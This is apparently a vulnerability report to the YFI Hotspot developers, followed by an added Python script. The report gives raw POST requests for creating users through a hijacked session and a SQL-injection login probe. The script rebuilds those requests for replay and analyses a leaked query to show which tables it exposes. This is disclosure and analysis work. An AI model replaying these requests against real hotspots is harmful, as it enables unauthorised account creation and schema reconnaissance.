Hello YFI Team,
My name is Mohamed Khaled Fathy [Web Application Security Researcher] from Egypt.
I've found a vulnerability in YFI Hotspot; maybe this bug is a critical bug.
URL: http://10.1.0.1/c2/yfi_cake/permanent_users/json_add/AP/?
POST Data:
username=123pp&password=matrix&name=&surname=&address=&phone=&email=&active=on&language=4a80e849-5300-46b5-9b64-4ba1a509ff00&realm=4ee90242-50bc-4905-bb49-03c80a010001&profile=54117885-4604-40c6-aeb7-05d90a010001&cap=hard
When I perform session hijacking I can create a new user on this network.
Also, I found an error in the database; it is leaking the contents of a database system.
Go to [ http://10.1.0.1/c2/yfi_cake/permanent_users/json_add/AP/? ]
URL: http://10.1.0.1/c2/yfi_cake/users/login
POST Data:
_method=POST&data%5BUser%5D%5Busername%5D=%27or%27%3D1%27&data%5BUser%5D%5Bpassword%5D=%27or%27%3D1%27
You can see:
2 SELECT User.id, User.username, User.password, User.name, User.surname, User.address, User.phone, User.email, User.active, User.cap, User.data, User.time, User.group_id, User.radcheck_id, User.profile_id, User.user_id, User.realm_id, User.language_id, User.created, User.modified, Group.id, Group.name, Group.created, Group.modified, Profile.id, Profile.name, Profile.template_id, Profile.created, Profile.modified, Creator.id, Creator.username, Creator.password, Creator.name, Creator.surname, Creator.address, Creator.phone, Creator.email, Creator.active, Creator.cap, Creator.data, Creator.time, Creator.group_id, Creator.radcheck_id, Creator.profile_id, Creator.user_id, Creator.realm_id, Creator.language_id, Creator.created, Creator.modified, Radcheck.id, Radcheck.username, Radcheck.attribute, Radcheck.op, Radcheck.value, Realm.id, Realm.name, Realm.append_string_to_user, Realm.icon_file_name, Realm.phone, Realm.fax, Realm.cell, Realm.email, Realm.url, Realm.address, Realm.created, Realm.modified, Language.id, Language.name, Language.iso_name, Language.created, Language.modified FROM users AS User LEFT JOIN groups AS Group ON (User.group_id = Group.id) LEFT JOIN profiles AS Profile ON (User.profile_id = Profile.id) LEFT JOIN users AS Creator ON (User.user_id = Creator.id) LEFT JOIN radcheck AS Radcheck ON (User.radcheck_id = Radcheck.id AND Attribute = 'Cleartext-Password') LEFT JOIN realms AS Realm ON (User.realm_id = Realm.id) LEFT JOIN languages AS Language ON (User.language_id = Language.id) WHERE User.username = '\'or\'=1\'' AND User.password = '6b413612c9b4cd979581aead27d728e406f3feba' LIMIT 1
Information leakage from the database.
Anonymous
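The following is an added example and is not code from the report or from the YFI project. It rebuilds the two POST bodies quoted above byte for byte from their fields (so the probes can be replayed with a hijacked session cookie), and it parses a constructed stand-in for the login page's response to pull out what the echoed query reveals: which tables the application joins, whether the single quotes in the `'or'=1'` payload arrived backslash-escaped, and whether the password is compared as a 40-hex digest rather than as the raw input. The HTML wrapper around the SQL is an assumption (the report does not include the page markup); the SQL text is the report's own, with the column list shortened. Only the standard library is used and nothing is sent over the network.

```python
"""Added example (not part of the original report): rebuild the two quoted
requests and analyse a constructed copy of the leaked login query.
Nothing here touches the network; the only input is embedded below."""
import re
from urllib.parse import urlencode

# Base path and endpoints exactly as quoted in the report.
BASE = "http://10.1.0.1/c2/yfi_cake"
LOGIN_URL = f"{BASE}/users/login"
ADD_USER_URL = f"{BASE}/permanent_users/json_add/AP/?"

# Field order matters: it reproduces the report's POST bodies byte for byte.
LOGIN_PAYLOAD = {
    "_method": "POST",
    "data[User][username]": "'or'=1'",
    "data[User][password]": "'or'=1'",
}
ADD_USER_PAYLOAD = {
    "username": "123pp", "password": "matrix",
    "name": "", "surname": "", "address": "", "phone": "", "email": "",
    "active": "on",
    "language": "4a80e849-5300-46b5-9b64-4ba1a509ff00",
    "realm": "4ee90242-50bc-4905-bb49-03c80a010001",
    "profile": "54117885-4604-40c6-aeb7-05d90a010001",
    "cap": "hard",
}


def login_body() -> str:
    """x-www-form-urlencoded body for the login probe (matches the report)."""
    return urlencode(LOGIN_PAYLOAD)


def add_user_body() -> str:
    """Body of the json_add request; replay it with a hijacked session cookie."""
    return urlencode(ADD_USER_PAYLOAD)


# CONSTRUCTED stand-in for the login response. The markup is assumed; the SQL
# is the report's query with the column list shortened.
SAMPLE_RESPONSE = r"""<html><body><pre class="constructed-debug-output">
2 SELECT User.id, User.username, User.password FROM users AS User
LEFT JOIN groups AS Group ON (User.group_id = Group.id)
LEFT JOIN profiles AS Profile ON (User.profile_id = Profile.id)
LEFT JOIN users AS Creator ON (User.user_id = Creator.id)
LEFT JOIN radcheck AS Radcheck ON (User.radcheck_id = Radcheck.id AND Attribute = 'Cleartext-Password')
LEFT JOIN realms AS Realm ON (User.realm_id = Realm.id)
LEFT JOIN languages AS Language ON (User.language_id = Language.id)
WHERE User.username = '\'or\'=1\'' AND User.password = '6b413612c9b4cd979581aead27d728e406f3feba' LIMIT 1
</pre></body></html>"""

# A SELECT echoed anywhere in the page, up to its LIMIT clause.
SQL_RE = re.compile(r"\bSELECT\b.*?\bLIMIT\s+\d+", re.S | re.I)
# Every "FROM <table> AS <alias>" / "JOIN <table> AS <alias>" in the statement.
TABLE_RE = re.compile(r"\b(?:FROM|JOIN)\s+(\w+)\s+AS\s+\w+", re.I)


def extract_leaked_sql(html: str):
    """Return the first SQL statement echoed in the page (whitespace
    normalised), or None when nothing leaked."""
    m = SQL_RE.search(html)
    return " ".join(m.group(0).split()) if m else None


def leaked_tables(sql: str):
    """Sorted, de-duplicated list of table names named in the statement."""
    return sorted(set(TABLE_RE.findall(sql)))


def payload_was_escaped(sql: str, payload: str) -> bool:
    """True if the payload reached the query with each ' turned into \\'."""
    return payload.replace("'", "\\'") in sql


def password_was_hashed(sql: str) -> bool:
    """True if the password is compared as a 40-hex digest, not raw input."""
    return re.search(r"User\.password = '[0-9a-f]{40}'", sql) is not None


def assess(html: str, payload: str) -> dict:
    """Summarise what the echoed query gives away about the login code path."""
    sql = extract_leaked_sql(html)
    if sql is None:
        return {"leak": False}
    return {
        "leak": True,
        "tables": leaked_tables(sql),
        "quotes_escaped": payload_was_escaped(sql, payload),
        "password_hashed": password_was_hashed(sql),
    }


if __name__ == "__main__":
    print("POST", LOGIN_URL, login_body())
    print("POST", ADD_USER_URL, add_user_body())
    print(assess(SAMPLE_RESPONSE, LOGIN_PAYLOAD["data[User][username]"]))
```

Run `assess()` against the real response body to confirm the leak and to see at a glance that the quotes were escaped and the password hashed before the query ran; the table list is what an attacker learns about the schema from the error alone.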